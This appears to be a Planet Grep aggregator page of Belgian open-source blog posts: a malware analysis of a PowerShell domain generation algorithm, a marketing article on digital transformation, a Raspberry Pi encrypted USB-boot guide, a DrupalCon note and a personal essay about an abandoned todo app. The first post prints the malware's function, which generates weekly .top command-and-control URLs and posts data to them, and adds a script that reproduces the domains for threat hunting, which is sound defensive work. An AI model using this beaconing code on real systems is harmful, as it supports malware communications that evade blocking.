Planet Grep

Planet'ing Belgian FLOSS people

Planet Grep is maintained by Wouter Verhelst. All times are in UTC.

July 14, 2020

DGA (“Domain Generation Algorithm”) is a technique implemented in some malware families to defeat defenders and to make the generation of IOCs (and their usage, for example to implement block lists) more difficult. When a piece of malware has to contact a C2 server, it uses domain names or IP addresses. Once the malicious code has been analyzed, it’s easy to build the list of domains/IPs used and to ask the network team to block access to these network resources. With a DGA, the list of domain names is generated based on some criteria, and the attacker just has to register the newly generated domain to move the C2 infrastructure somewhere else… This is a great cat & mouse game!

I found a malicious PowerShell script that implements a simple DGA. Here is the code:

function xfyucaesbv( $etdtyefbg ){
  $ubezabcvwd = "";
  "ge","6h","sp","FT","4H","fW","mP" | %{ $ubezabcvwd += ","+"http://"+ ( [Convert]::ToBase64String( [System.Text.Encoding]::UTF8.GetBytes( $_+ $(Get-Date -UFormat "%y%m%V") ) ).toLower() ) +".top/"; };
  $ubezabcvwd.split(",") | %{
    if( !$myurlpost ) {
      $myurlpost = $_ -replace "=", "";
      if(!(sendpost2($etdtyefbg + "&domen=$myurlpost"))) {
        $myurlpost = $false;
      }
      Start-Sleep -s 5;
    }
  };
  if( $etdtyefbg -match "status=register" ){
    return "ok";
  } else {
    return $myurlpost;
  }
}

The most interesting line is this one:

PS C:\Users\REM> "ge","6h","sp","FT","4H","fW","mP" | %{ $ubezabcvwd += ","+"http://"+ ( [Convert]::ToBase64String( [System.Text.Encoding]::UTF8.GetBytes( $_+ $(Get-Date -UFormat "%y%m%V") ) ).toLower() ) +".top/"; };

The first hostname is hardcoded, but the others are generated by concatenating one string (from the array) with a timestamp. The result is Base64-encoded, lowercased, and the padding is removed if present. Example:

base64("ge" + "200729") = "z2uymda3mjk="

The fact that the timestamp is based on ‘%V’ (which returns the ISO week number of the current year) is a good indicator of a DGA: a new set of domains is generated every week.
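The generation is easy to reproduce outside PowerShell. Here is a small shell sketch of mine (my own reconstruction, not part of the malicious script) that prints the seven URLs for a given week; pass a timestamp like 200729, or let it default to the current UTC year/month/week:

```shell
#!/bin/sh
# Reproduce the DGA: base64(prefix + yymmWW), lowercased, '=' padding stripped.
# The timestamp defaults to the current UTC year/month/ISO-week, mirroring
# PowerShell's Get-Date -UFormat "%y%m%V" (requires GNU date for %V).
stamp=${1:-$(date -u +%y%m%V)}
for prefix in ge 6h sp FT 4H fW mP; do
    domain=$(printf '%s%s' "$prefix" "$stamp" | base64 | tr -d '=' | tr 'A-Z' 'a-z')
    printf 'http://%s.top/\n' "$domain"
done
```

With 200729 as the argument, the first URL printed is http://z2uymda3mjk.top/, matching the example above.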

I tried to resolve the domain names from the list above but none of them is registered right now. I generated the domains for the next two months and added them to my hunting rules.

I’ll keep an eye on them!

[The post Simple DGA Spotted in a Malicious PowerShell has been first published on /dev/random]

Today, Acquia announced the launch of its Open Digital Experience Platform, a single platform to build websites and applications, and run data-driven marketing campaigns across channels. As a part of the launch, I wrote a piece for Digiday on the impact COVID-19 is having on digital transformation. Even though many organizations are under pressure to rapidly transition their operations online, the changes they make now can have a positive impact for years to come. Below is the full text of the article.

Over the past few years, we've seen rapid innovation in many parts of the consumer world. Brands build pop-up stores overnight to test new retail, product, and marketing concepts. The same thing is happening digitally, driven by COVID-19. Businesses need to operate on compressed timelines and "pop up" new digital-first businesses (or, as TechCrunch calls it, undergo a flash digital transformation).

In the past, these efforts would have taken years. This period of rapid change has certainly been difficult for many organizations. However, many of the changes organizations have made in the first half of this year will have a big impact for years to come.

One example of a brand that adapted its digital strategy due to COVID-19 is King Arthur Flour, the oldest flour company in America. The pandemic resulted in a surge of people baking at home. No longer able to rely on brick-and-mortar sales, King Arthur Flour's digital team drove demand online. They published new celebrity baking series and other creative, relevant content on their site. As a result, their sales increased 200 percent year-over-year, and website sessions spiked by 260 percent.

Other brands can be just as successful at flash transformation if they keep an eye on the three biggest trends driving it.

Trend 1: Experience wins, and requires intelligent use of data

Both a taxi and an Uber or Lyft can get you from point A to B. At the core, they are the same product. But in practice, the Uber or Lyft experience wins — at least in Boston, where I live and where taxis are notoriously bad.

Both Uber and Lyft rely on technology to deliver a superior customer experience. Every aspect of their customer experience is personalized, including their mobile applications, emails, text messages, safety features, and more.

For years, the promise of a personalized customer experience has remained elusive, available only to those who can make large engineering investments (like Uber or Lyft). Today, any organization can deliver great technology-driven customer experiences; Open Source has democratized building them. However, personalization remains hard. It requires that organizations get a handle on their customer data, which isn't an easy task and not something that Open Source solves.

Only when you use data to understand your customers' preferences and intentions can you deliver a truly relevant experience. In difficult economic times, relevant experiences help businesses stand out and drive much-needed sales.

Trend 2: The rise of the technical marketer

Marketers have become increasingly reliant on technology to drive customer experiences. Twenty years ago, a web content management system was a stand-alone application run by IT. Today, content management is deeply integrated into the marketing technology stack and primarily operated by marketing.

It's not unusual for an ambitious website to have five or more connections into other systems. Marketing technology expert Scott Brinker counted over 8,000 marketing technology vendors in 2020, a 13.6 percent increase over 2019.

A technical marketer knows how to navigate this landscape to choose the best tools for their organization. For technical marketers, it's essential to have the right platform to integrate the tools and data sources needed to optimize their customers' experiences. The rise of that technical marketer has enabled a new relationship and partnership between marketing and IT.

Trend 3: Openness

Until recently, the idea of "open" technology was a hard sell to marketers. On the other hand, developers have embraced open APIs, Open Source, and connectors for years.

More and more, marketers find themselves road-blocked by closed systems. When a marketing automation system can't talk to other data sources, it can be impossible to implement effective personalization. When an email marketing tool only draws upon the data contained within its own system, it misses out on the data that is collected by a separate web analytics tool. Examples of these types of silos across the traditional marketing stack abound.

Without the ability to integrate different marketing tools and the data contained within them, customer experiences will continue to be disjointed and far from personal. In fact, research shows that 60 percent of customers are frustrated with brands' ability to predict their needs, and think they aren't doing an effective job of using personalization. To address these frustrations, openness and interconnectivity between technologies needs to become a marketing must-have, instead of a nice-to-have.

A new age of resilience

It's been impressive to see how resilient organizations and people have been in adapting so rapidly. This adaptation has been essential to business survival. Fortunately, the changes made under pressure could be the key to succeeding as more of the world becomes permanently digital, enabling the kinds of digital transformations that organizations have been seeking for years.

July 12, 2020

The Raspberry Pi has become more and more powerful in recent years, maybe too powerful to be a “maker board”. The higher CPU power and the availability of more memory - up to 8GB - make it more suitable for home server usage.

The latest firmware (EEPROM) enables booting from a USB device. To enable USB boot, the EEPROM on the Raspberry Pi needs to be updated to the latest version, and the bootloader that comes with the operating system - the start*.elf, etc. files on the boot filesystem - needs to support it.

I always try to use filesystem encryption. You’ll find my journey to install GNU/Linux on an encrypted filesystem below.

64-bit operating systems

The Raspberry Pi 4 has a 64-bit CPU, but the default operating system for it - Raspberry Pi OS (previously called Raspbian) - is still 32-bit. To take full advantage of the 64-bit CPU, a 64-bit operating system is required.

You’ll find an overview of GNU/Linux distributions for the RPI4 below.

  • Raspberry PI OS

    Raspberry Pi OS is the default operating system for the Raspberry Pi. The operating system is 32-bit.

    There is a beta version with 64-bit support available.

  • Ubuntu

    Ubuntu for the Raspberry Pi has 64-bit support, but the boot process isn’t fully compatible with USB boot: the bootloader isn’t up-to-date enough to support it, and the u-boot loader isn’t yet updated to support USB boot either.

  • Kali Linux

    Kali Linux is another 64-bit operating system for the Raspberry Pi, but its bootloader isn’t updated enough to support USB boot.

  • Arch Linux ARM

    Arch Linux ARM has an install image for the Raspberry Pi 4, but the default install image is still 32-bit. Arch Linux ARM does have 64-bit support, so you could build your own image with the 64-bit packages and a custom kernel.

  • Manjaro

    Manjaro is based on Arch Linux and has 64-bit support for the Raspberry Pi. Manjaro is a rolling distribution, and its boot loader is up-to-date enough to support USB boot.

  • Other

    The list above covers the GNU/Linux distributions that I considered for my Raspberry Pi 4. There are - as always - other options. The distributions that don’t support booting from a USB device yet will probably support it soon.

I was looking for a GNU/Linux distribution with both 64-bit support and USB boot support, and went with Manjaro.

The installation process to install Manjaro on an encrypted filesystem is similar to the installation on an x86_64 system running Arch Linux. See my previous blog posts: Install Arch on an encrypted btrfs partition and Install Parabola GNU/Linux on an Encrypted btrfs logical volume.

USB boot

To enable the raspberry pi 4 to boot from USB, you need to update your firmware. The boot loader also needs to be updated to enable booting from a USB device.

Get the latest firmware

Manjaro didn’t include the latest stable firmware needed to enable USB boot, so I used the 64-bit beta of Raspberry Pi OS to update the firmware.

Update Raspberry PI OS to get the latest firmware.

pi@raspberrypi:~ $ sudo apt-get update
Hit:1 buster InRelease
Hit:2 buster InRelease
Hit:3 buster/updates InRelease
Hit:4 buster-updates InRelease
Reading package lists... Done
pi@raspberrypi:~ $ sudo apt-get full-upgrade
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Calculating upgrade... Done
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
pi@raspberrypi:~ $ 

Verify that the latest firmware is available.

The latest stable bootloader is located at /lib/firmware/raspberrypi/bootloader/stable.

pi@raspberrypi:~ $ cd /lib/firmware/raspberrypi/
pi@raspberrypi:/lib/firmware/raspberrypi $ ls
pi@raspberrypi:/lib/firmware/raspberrypi $ cd bootloader/stable/
pi@raspberrypi:/lib/firmware/raspberrypi/bootloader/stable $ 

Verify that a pieeprom image newer than 2020-06-xx is available.

pi@raspberrypi:/lib/firmware/raspberrypi/bootloader/stable $ ls -l
total 1220
-rw-r--r-- 1 root root 524288 Apr 23 17:53 pieeprom-2020-04-16.bin
-rw-r--r-- 1 root root 524288 Jun 17 11:15 pieeprom-2020-06-15.bin
-rw-r--r-- 1 root root  98148 Jun 17 11:15 recovery.bin
-rw-r--r-- 1 root root  98904 Feb 28 15:41 vl805-000137ad.bin
pi@raspberrypi:/lib/firmware/raspberrypi/bootloader/stable $ 

Get the current version

Execute vcgencmd bootloader_version to get the current firmware version.

Please note that I already updated the firmware in the output below.

pi@raspberrypi:/lib/firmware/raspberrypi/bootloader/stable $ vcgencmd bootloader_version
Jun 15 2020 14:36:19
version c302dea096cc79f102cec12aeeb51abf392bd781 (release)
timestamp 1592228179


Install the new EEPROM image with rpi-eeprom-update:

pi@raspberrypi:/lib/firmware/raspberrypi/bootloader/stable $ sudo rpi-eeprom-update -d -f ./pieeprom-2020-06-15.bin
BCM2711 detected
VL805 firmware in bootloader EEPROM
BOOTFS /boot
*** INSTALLING ./pieeprom-2020-06-15.bin  ***
BOOTFS /boot
EEPROM update pending. Please reboot to apply the update.
pi@raspberrypi:/lib/firmware/raspberrypi/bootloader/stable $ 


pi@raspberrypi:/lib/firmware/raspberrypi/bootloader/stable $ sudo reboot

Verify the version again.

pi@raspberrypi:~ $ vcgencmd bootloader_version
Jun 15 2020 14:36:19
version c302dea096cc79f102cec12aeeb51abf392bd781 (release)
timestamp 1592228179
pi@raspberrypi:~ $ 

The Raspberry PI is ready to boot from USB.

Install Manjaro on an encrypted filesystem

Manjaro runs an install script after the RPi is booted to complete the installation.

We have two options:

  • Boot the Pi from the standard non-encrypted image and move the installation to an encrypted filesystem.
  • Extract the installation image and move the content to an encrypted filesystem.

You’ll find my journey with the second option below. The host system used to extract and install the image is an x86_64 system running Arch Linux.

Download and copy

Download and verify the Manjaro image.

Copy the image to keep the original intact.

[root@vicky manjaro]# cp Manjaro-ARM-xfce-rpi4-20.06.img image

Create tarball

Verify the image

Verify the image layout with fdisk -l.

[root@vicky manjaro]# fdisk -l image
Disk image: 4.69 GiB, 5017436160 bytes, 9799680 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x090a113e

Device     Boot  Start     End Sectors   Size Id Type
image1           62500  500000  437501 213.6M  c W95 FAT32 (LBA)
image2          500001 9799679 9299679   4.4G 83 Linux
[root@vicky manjaro]# 

We’ll use kpartx to map the partitions in the image so we can mount them. kpartx is part of the multipath-tools.

Map the partitions in the image with kpartx -av; the “-a” option adds the partition mappings and “-v” makes it verbose so we can see where the partitions are mapped to.

[root@vicky manjaro]# kpartx -av image
add map loop1p1 (254:10): 0 437501 linear 7:1 62500
add map loop1p2 (254:11): 0 9299679 linear 7:1 500001
[root@vicky manjaro]#
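As a side note, if kpartx isn’t available, the same partitions can be mounted with a plain loop mount and an explicit byte offset. This is a sketch of mine derived from the fdisk output above (start sector times the 512-byte sector size), not a step from the original walkthrough:

```shell
# Byte offsets of the two partitions inside the image, from the fdisk output:
# boot starts at sector 62500, root at sector 500001; sectors are 512 bytes.
SECTOR_SIZE=512
BOOT_OFFSET=$((62500 * SECTOR_SIZE))     # 32000000
ROOT_OFFSET=$((500001 * SECTOR_SIZE))    # 256000512
echo "boot offset: $BOOT_OFFSET, root offset: $ROOT_OFFSET"
# mount -o loop,offset="$ROOT_OFFSET" image /mnt/chroot
# mount -o loop,offset="$BOOT_OFFSET" image /mnt/chroot/boot
```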

Create the destination directory.

[root@vicky manjaro]# mkdir /mnt/chroot

Mount the partitions.

[root@vicky manjaro]# mount /dev/mapper/loop1p2 /mnt/chroot
[root@vicky manjaro]# mount /dev/mapper/loop1p1 /mnt/chroot/boot
[root@vicky manjaro]#

Create the tarball.

[root@vicky manjaro]# cd /mnt/chroot/
[root@vicky chroot]# tar czvpf /home/staf/Downloads/isos/manjaro/Manjaro-ARM-xfce-rpi4-20.06.tgz .


[root@vicky ~]# umount /mnt/chroot/boot 
[root@vicky ~]# umount /mnt/chroot
[root@vicky ~]# cd /home/staf/Downloads/isos/manjaro/
[root@vicky manjaro]# kpartx -d image
loop deleted : /dev/loop1
[root@vicky manjaro]# 

Partition and create filesystems


Partition your hard disk; delete all existing partitions first if there are any on the disk.

I’ll create 3 partitions on my hard disk:

  • a boot partition of 500 MB (type c, ‘W95 FAT32 (LBA)’)
  • a root partition of 50 GB
  • a third partition with the remaining space
[root@vicky ~]# fdisk /dev/sdh

Welcome to fdisk (util-linux 2.35.2).
Changes will remain in memory only, until you decide to write them.
Be careful before using the write command.

Device does not contain a recognized partition table.
Created a new DOS disklabel with disk identifier 0x49887ce7.

Command (m for help): n
Partition type
   p   primary (0 primary, 0 extended, 4 free)
   e   extended (container for logical partitions)
Select (default p): p
Partition number (1-4, default 1): 
First sector (2048-976773167, default 2048): 
Last sector, +/-sectors or +/-size{K,M,G,T,P} (2048-976773167, default 976773167): +500M

Created a new partition 1 of type 'Linux' and of size 500 MiB.

Command (m for help): n
Partition type
   p   primary (1 primary, 0 extended, 3 free)
   e   extended (container for logical partitions)
Select (default p): p
Partition number (2-4, default 2): 2
First sector (1026048-976773167, default 1026048): 
Last sector, +/-sectors or +/-size{K,M,G,T,P} (1026048-976773167, default 976773167): +50G

Created a new partition 2 of type 'Linux' and of size 50 GiB.

Command (m for help): n
Partition type
   p   primary (2 primary, 0 extended, 2 free)
   e   extended (container for logical partitions)
Select (default p): p
Partition number (3,4, default 3): 
First sector (105883648-976773167, default 105883648): 
Last sector, +/-sectors or +/-size{K,M,G,T,P} (105883648-976773167, default 976773167): 

Created a new partition 3 of type 'Linux' and of size 415.3 GiB.

Command (m for help): t
Partition number (1-3, default 3): 1
Hex code (type L to list all codes): c

Changed type of partition 'Linux' to 'W95 FAT32 (LBA)'.

The partition table has been altered.
Calling ioctl() to re-read partition table.
Syncing disks.
Command (m for help):  

Create the boot file system

The raspberry pi uses a FAT filesystem for the boot partition.

[root@vicky ~]# mkfs.vfat /dev/sdh1
mkfs.fat 4.1 (2017-01-24)
[root@vicky ~]# 

Create the root filesystem

Overwrite the root partition with random data

Because we are creating an encrypted filesystem, it’s a good idea to overwrite the partition with random data first. We’ll use badblocks for this. Another method is “dd if=/dev/random of=/dev/xxx”; the dd method is probably the better one, but it is a lot slower.

[root@vicky ~]# badblocks -c 10240 -s -w -t random -v /dev/sdh2
Checking for bad blocks in read-write mode
From block 0 to 52428799
Testing with random pattern: done                                                 
Reading and comparing: done                                                 
Pass completed, 0 bad blocks found. (0/0/0 errors)
[root@vicky ~]# 
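For completeness, the dd method mentioned above looks like the sketch below. I’m demonstrating it on a 1 MiB file rather than the real /dev/sdh2, and using /dev/urandom, which doesn’t block the way /dev/random can:

```shell
# Demo of the dd wiping method on a small file; point of= at the real
# partition (e.g. /dev/sdh2) to wipe an actual disk.
dd if=/dev/urandom of=demo.img bs=1M count=1 status=none
stat -c %s demo.img    # prints the size in bytes: 1048576
rm -f demo.img
```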

Encrypt the root filesystem


I booted the RPI4 from an SD card to verify the encryption speed by executing cryptsetup benchmark.

[root@minerva ~]# cryptsetup benchmark
# Tests are approximate using memory only (no storage IO).
PBKDF2-sha1       398395 iterations per second for 256-bit key
PBKDF2-sha256     641723 iterations per second for 256-bit key
PBKDF2-sha512     501231 iterations per second for 256-bit key
PBKDF2-ripemd160  330156 iterations per second for 256-bit key
PBKDF2-whirlpool  124356 iterations per second for 256-bit key
argon2i       4 iterations, 319214 memory, 4 parallel threads (CPUs) for 256-bit key (requested 2000 ms time)
argon2id      4 iterations, 321984 memory, 4 parallel threads (CPUs) for 256-bit key (requested 2000 ms time)
#     Algorithm |       Key |      Encryption |      Decryption
        aes-cbc        128b        23.8 MiB/s        77.7 MiB/s
    serpent-cbc        128b               N/A               N/A
    twofish-cbc        128b        55.8 MiB/s        56.2 MiB/s
        aes-cbc        256b        17.4 MiB/s        58.9 MiB/s
    serpent-cbc        256b               N/A               N/A
    twofish-cbc        256b        55.8 MiB/s        56.1 MiB/s
        aes-xts        256b        85.0 MiB/s        74.9 MiB/s
    serpent-xts        256b               N/A               N/A
    twofish-xts        256b        61.1 MiB/s        60.4 MiB/s
        aes-xts        512b        65.4 MiB/s        57.4 MiB/s
    serpent-xts        512b               N/A               N/A
    twofish-xts        512b        61.3 MiB/s        60.3 MiB/s
[root@minerva ~]# 

Create the LUKS volume

The aes-xts cipher seems to have the best performance on the RPI4.

[root@vicky ~]# cryptsetup luksFormat --cipher aes-xts-plain64 --key-size 256 --hash sha256 --use-random /dev/sdh2

This will overwrite data on /dev/sdh2 irrevocably.

Are you sure? (Type 'yes' in capital letters): YES
Enter passphrase for /dev/sdh2: 
Verify passphrase: 
WARNING: Locking directory /run/cryptsetup is missing!
[root@vicky ~]# 

Open the LUKS volume

[root@vicky ~]# cryptsetup luksOpen /dev/sdh2 cryptroot
Enter passphrase for /dev/sdh2: 
[root@vicky ~]# 

Create the root filesystem

[root@vicky ~]# mkfs.ext4 /dev/mapper/cryptroot
mke2fs 1.45.6 (20-Mar-2020)
Creating filesystem with 13103104 4k blocks and 3276800 inodes
Filesystem UUID: 557677f1-9705-4beb-8c8b-e36c552730f3
Superblock backups stored on blocks: 
	32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208, 
	4096000, 7962624, 11239424

Allocating group tables: done                            
Writing inode tables: done                            
Creating journal (65536 blocks): done
Writing superblocks and filesystem accounting information: done   

[root@vicky ~]# 

Mount and extract

Mount the root filesystem.

[root@vicky ~]# mount /dev/mapper/cryptroot /mnt/chroot
[root@vicky ~]# mkdir -p /mnt/chroot/boot
[root@vicky ~]# mount /dev/sdh1 /mnt/chroot/boot
[root@vicky ~]# 

And extract the tarball.

[root@vicky manjaro]# cd /home/staf/Downloads/isos/manjaro/
[root@vicky manjaro]# tar xzvf Manjaro-ARM-xfce-rpi4-20.06.tgz -C /mnt/chroot/
[root@vicky manjaro]# sync


To continue the setup, we need to boot or chroot into the operating system. It’s possible to run ARM64 code on an x86_64 system with qemu, which will emulate an ARM64 CPU.

Install qemu-arm-static

Install the qemu-arm-static package. It’s not in the main Arch Linux repositories, but it’s available in the AUR.

[staf@vicky ~]$ yay -S qemu-arm-static 

copy qemu-arm-static

Copy the qemu-arm-static into the chroot.

[root@vicky manjaro]# cp /usr/bin/qemu-arm-static /mnt/chroot/usr/bin/
[root@vicky manjaro]# 

mount proc & co

To be able to run programs in the chroot we need the proc, sys and dev filesystems mapped into the chroot.

[root@vicky ~]# mount -t proc none /mnt/chroot/proc
[root@vicky ~]# mount -t sysfs none /mnt/chroot/sys
[root@vicky ~]# mount -o bind /dev /mnt/chroot/dev
[root@vicky ~]# mount -o bind /dev/pts /mnt/chroot/dev/pts
[root@vicky ~]# 


Chroot into ARM64 installation.

LANG=C chroot /mnt/chroot/

Set the PATH.

[root@vicky /]# export PATH=/sbin:/bin:/usr/sbin:/usr/bin

And verify that we are running aarch64.

[root@vicky /]# uname -a
Linux vicky 5.6.19.a-1-hardened #1 SMP PREEMPT Sat, 20 Jun 2020 15:16:50 +0000 aarch64 GNU/Linux
[root@vicky /]# 

Update and install vi

Update all packages to the latest version.

[root@vicky /]# pacman -Syu

We need an editor.

[root@vicky /]# pacman -S vi
resolving dependencies...
looking for conflicting packages...

Packages (1) vi-1:070224-4

Total Download Size:   0.15 MiB
Total Installed Size:  0.37 MiB

:: Proceed with installation? [Y/n] y
:: Retrieving packages...
 vi-1:070224-4-aarch64                         157.4 KiB  2.56 MiB/s 00:00 [##########################################] 100%
(1/1) checking keys in keyring                                             [##########################################] 100%
(1/1) checking package integrity                                           [##########################################] 100%
(1/1) loading package files                                                [##########################################] 100%
(1/1) checking for file conflicts                                          [##########################################] 100%
(1/1) checking available disk space                                        [##########################################] 100%
:: Processing package changes...
(1/1) installing vi                                                        [##########################################] 100%
Optional dependencies for vi
    s-nail: used by the preserve command for notification
:: Running post-transaction hooks...
(1/1) Arming ConditionNeedsUpdate...
[root@vicky /]# 



Add encrypt to HOOKS before filesystems in /etc/mkinitcpio.conf.

[root@vicky /]#  vi /etc/mkinitcpio.conf
HOOKS=(base udev autodetect modconf block encrypt filesystems keyboard fsck)

Create the boot image

[root@vicky /]# ls -l /etc/mkinitcpio.d/
total 4
-rw-r--r-- 1 root root 246 Jun 11 11:06 linux-rpi4.preset
[root@vicky /]# 
[root@vicky /]# mkinitcpio -p linux-rpi4
==> Building image from preset: /etc/mkinitcpio.d/linux-rpi4.preset: 'default'
  -> -k 4.19.127-1-MANJARO-ARM -c /etc/mkinitcpio.conf -g /boot/initramfs-linux.img
==> Starting build: 4.19.127-1-MANJARO-ARM
  -> Running build hook: [base]
  -> Running build hook: [udev]
  -> Running build hook: [autodetect]
  -> Running build hook: [modconf]
  -> Running build hook: [block]
  -> Running build hook: [encrypt]
==> ERROR: module not found: `dm_integrity'
  -> Running build hook: [filesystems]
  -> Running build hook: [keyboard]
  -> Running build hook: [fsck]
==> Generating module dependencies
==> Creating gzip-compressed initcpio image: /boot/initramfs-linux.img
==> WARNING: errors were encountered during the build. The image may not be complete.
[root@vicky /]#

update boot settings…

Get the UUID for the boot and the root partition.

[root@vicky boot]# ls -l /dev/disk/by-uuid/ | grep -i sdh
lrwxrwxrwx 1 root root 12 Jul  8 11:42 xxxx-xxxx -> ../../sdh1
lrwxrwxrwx 1 root root 12 Jul  8 12:44 xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx -> ../../sdh2
[root@vicky boot]# 

The Raspberry PI uses cmdline.txt to specify the boot options.

[root@vicky ~]# cd /boot
[root@vicky boot]# 
[root@vicky boot]# cp cmdline.txt cmdline.txt_org
[root@vicky boot]# 
cryptdevice=/dev/disk/by-uuid/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx1:cryptroot root=/dev/mapper/cryptroot rw rootwait console=ttyAMA0,115200 console=tty1 selinux=0 plymouth.enable=0 smsc95xx.turbo_mode=N dwc_otg.lpm_enable=0 kgdboc=ttyAMA0,115200 elevator=noop snd-bcm2835.enable_compat


Update /etc/fstab:

[root@vicky etc]# cp fstab fstab_org
[root@vicky etc]# vi fstab
[root@vicky etc]# 
# Static information about the filesystems.
# See fstab(5) for details.

# <file system> <dir> <type> <options> <dump> <pass>
UUID=xxxx-xxxx  /boot   vfat    defaults        0       0

Finish your setup

Set the root password.

[root@vicky etc]# passwd

Set the timezone.

[root@vicky etc]# ln -s /usr/share/zoneinfo/Europe/Brussels /etc/localtime

Generate the required locales.

[root@vicky etc]# vi /etc/locale.gen 
[root@vicky etc]# locale-gen

Set the hostname.

[root@vicky etc]# vi /etc/hostname

clean up

Exit chroot

[root@vicky etc]# exit
[root@vicky ~]# uname -a
Linux vicky 5.6.19.a-1-hardened #1 SMP PREEMPT Sat, 20 Jun 2020 15:16:50 +0000 x86_64 GNU/Linux
[root@vicky ~]# 

Make sure that there are no processes still running from the chroot.

[root@vicky ~]# ps aux | grep -i qemu
root      160666  0.0  0.1 323228 35468 ?        Ssl  16:50   0:00 /usr/bin/qemu-aarch64-static /usr/bin/gpg-agent --homedir /etc/pacman.d/gnupg --use-standard-socket --daemon
root      203274  0.0  0.0   6812  2188 pts/1    S+   17:14   0:00 grep -i qemu
[root@vicky ~]# 

Kill the processes from the chroot.

[root@vicky ~]# kill 160666
[root@vicky ~]# 

Umount the chroot filesystems.

[root@vicky manjaro]# mount | grep -i chroot | awk '{print $3}'
[root@vicky manjaro]# 
[root@vicky manjaro]#  mount | grep -i chroot | awk '{print $3}' | xargs -n1 umount 
umount: /mnt/chroot: target is busy.
umount: /mnt/chroot/dev: target is busy.
[root@vicky manjaro]#  mount | grep -i chroot | awk '{print $3}' | xargs -n1 umount 
umount: /mnt/chroot: target is busy.
[root@vicky manjaro]#  mount | grep -i chroot | awk '{print $3}' | xargs -n1 umount 
[root@vicky manjaro]# 

Close the LUKS volume.

[root@vicky ~]# cryptsetup luksClose cryptroot
[root@vicky ~]# sync
[root@vicky ~]# 


Connect the USB disk to the Raspberry Pi and power it on. If you are lucky, the Pi will boot from the USB device and ask you to type the passphrase to decrypt the root filesystem.

Have fun!


July 10, 2020

I remember the first gathering of Drupal contributors back in 2005. At the time, there were less than 50 people in attendance. In the 15 years since that first gathering, DrupalCon has become the heartbeat of the Drupal community. With each new DrupalCon, we introduce new people to our community, demonstrate the best that Drupal has to offer, and reconnect with our Drupal family.

Next week's DrupalCon Global is going to be no different.

Because of COVID-19, it is the first DrupalCon that will be 100% virtual. But as much as we may miss seeing each other in person, the switch to virtual has opened opportunities to bring in speakers and attendees who never would have been able to attend otherwise.

There are a few moments I'm particularly excited about:

  • Mitchell Baker, CEO and Chair of the Mozilla Foundation, is joining us to talk about the future of the Open Web, and the importance of Open Source software.
  • Jacqueline Gibson, Digital Equity Advocate and Software Engineer from Microsoft, will be talking about Digital Inequity for the Black community – a topic I believe is deeply important for our community and the world.
  • Leaders of current Drupal strategic initiatives will be presenting their progress and their calls for action to keep Drupal the leading CMS on the web.
  • And of course, I'll be giving my keynote presentation to celebrate the community's accomplishment in releasing Drupal 9, and to talk about Drupal's future.

Beyond the sessions, I look forward to the human element of the conference. The side conversations and reunions with old friends make attending DrupalCon so much more powerful than simply watching the recordings after the fact. I hope to see you at DrupalCon Global next week!

July 09, 2020

In the last two weeks, Peter Zaitsev published a 4-part series on measuring Linux performance on this blog.

July 08, 2020

This post is the last part in a four-part blog series by Peter Zaitsev, Percona Chief Executive Officer.

July 07, 2020

How a broken screen kicked me out of developing an Open Source software and how the community revived it 6 years later

When I discovered the FLOSS world, at the dawn of this century, I thought developers were superheroes. Sort of semi-gods who achieved everything I wanted to do with my life, like having their face displayed on a planet, their name on the Wikipedia page describing their software, or launching a free software company sold for millions. (Spoiler: I didn’t achieve the latter.) I was excited like a groupie when I could have a casual chat with Federico Mena Quintero or hang out with Michael Meeks.

I never understood why some successful developers suddenly disappeared and left their software unmaintained. I was shocked that some of them started to contribute to proprietary software. They had everything!

Without surprise, I followed that exact same path myself a few years later, without premeditation. All it took was for my laptop’s screen to break while I was giving a conference about, note the irony, Free Software.

But let’s tell things in order.

Starting a FLOSS project

As a young R&D engineer in my mid-twenties, I quickly discovered the need for an organisational system in order to get things done. Inspired by the Getting Things Done book, I designed my own system but found no software to implement it properly. Most todo software was either too simplistic (useful only for groceries) or too complex (entering a task required filling tens of fields in an awful interface). To some extent, this is still the case today. No software managed to be simple and yet powerful, allowing you to take notes with your todos, to set a start date before which it would make no sense to work on the task, or to have dependencies between tasks.

I decided to write my own software and convinced my lifelong friend Bertrand to join me. In the summer of 2009, we spent several days in his room drawing mockups on a white board. We wanted to get the UX right before any coding.

Long story short: it looks like we made the right choices, and Getting Things GNOME! (yep, that was the name) quickly became popular. It was regularly cited in “Top 10 Ubuntu apps” lists and widely popular in the Ubuntu app store. We even had many non-Linux users trying to port it to Windows because there was no equivalent. For the next four years, I would spend my nights coding, refactoring, developing and building a community.

The project started to attract lots of contributors and some of them, like Izidor and Parin, became friends. It was a beautiful experience. Last but not least, I switched to a day job which involved managing free software development with a team of rock-star developers. I was literally paid to attend FOSDEM or GUADEC and to work with colleagues I appreciated. And, yes, my head was on planet.gnome and GTG had its own Wikipedia page.

The great stall

Unfortunately, 2014 started with a lay-off at Lanedo, the company I was working for. I got involved in the local startup scene and was also giving talks about Free Software. During one of them, my laptop’s screen suddenly stopped working. I managed to finish thanks to the projector, but the laptop now required an external screen.

Being broke and jobless, I bought the cheapest laptop I could find: a Chromebook. With the Chromebook, I started investigating web services.

This is perhaps one of my biggest regrets: not having developed GTG as a webapp. If I had, things would probably have been very different. But I didn’t like web development. And still don’t like it today. In the end, it was not possible to code for GTG on the Chromebook.

After a few months, I landed a job at Elium. My friend and CEO Antoine convinced me to try a company MacBook instead of a Linux laptop. I agreed to the test and started diving into the Apple world.

I never found a todo app that was as good as GTG, so I started to try every new shiny (and expensive) thing. I used Evernote, Todoist, Things and many others. I wanted to be productive on my Mac. The Mac App Store helped by showering me with recommendations and new arrivals of fantastic productivity apps.

I didn’t want to acknowledge it but, in fact, I had suddenly abandoned GTG. I didn’t even have a working Linux computer.

I was not worried because there were many very skilled and motivated contributors, the main one being Izidor. What I didn’t imagine at the time was that Izidor would go from being a bored student to a full-time Google employee with a real life outside free software.

A Free Software project needs more than developers. There’s a strong need for a « community animator »: someone who takes decisions, who communicates and is the heartbeat of the project. It’s a role often overlooked when it is filled by the lead dev. I was always the main animator behind GTG, even at times when I was writing less code than other contributors. Something I didn’t realise at the time.

